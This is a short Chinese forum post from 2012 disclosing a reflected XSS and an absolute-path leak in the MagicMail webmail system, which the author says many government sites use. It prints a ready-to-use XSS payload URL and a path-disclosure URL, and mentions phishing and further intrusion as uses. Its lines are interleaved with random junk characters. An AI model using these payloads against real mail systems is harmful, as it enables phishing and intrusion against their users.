今天上午在黑盒测试本地的教育网的时候发现的一个邮件系统漏洞
7 [$ u2 E0 k- s* T) A. ]: G, b1 `; l; X
4 |; n! D2 v. p1 x0 `
包含 一个反射性XSS 以及 绝对路径泄漏
6 X4 y7 U$ M) \) I" T! X看了看 貌似全部是linux的。* Q* z3 L* a) F0 e% e
+ H. ?9 g/ a. Q4 D" E
关键字:迈捷邮件系统 by MagicMail& j; f% O7 n7 i+ x" ^! B
1 {" _9 T" w4 F4 Q可以看到很多政府网站都用这个邮件系统. O8 a9 c7 e) Q+ Q, j
7 @. `6 v+ S$ P0 L# b3 j
绝对路径 http://madman.in/index.php?login_type=declare&language=
6 ~# @* }6 b# V& o5 i" q+ j% m+ \" E
6 n1 O. v/ _7 T. K6 i6 q( F4 P1 D y
4 I9 @% x$ d1 A3 H2 y, h. I* wXSS:http://madman.in/index.php?login_type=declare&language=–%3E%27%22%3E%3Csvg%3E%3Cscript/xlink:href=data:,while%28true%29{alert%281%29}%3E%3C/script%3E
7 |( {' Y* K, ^8 M& X2 w+ B2 y/ D
8 M3 e0 c$ `" X& w
. f$ H* i. K3 e; F虽然危害不是很大,不过利用起来还是可以的 比如 钓鱼 比如进一步的渗透 等等$ H) I( ~0 v+ z7 H/ W$ ^$ Q. J
5 \( a7 l8 p' K/ r: O' d修复方案:看官方补丁吧。; a) [0 y2 M# v$ [1 ` X$ R
|
发表于 2012-11-9 20:38:41
收藏
支持
反对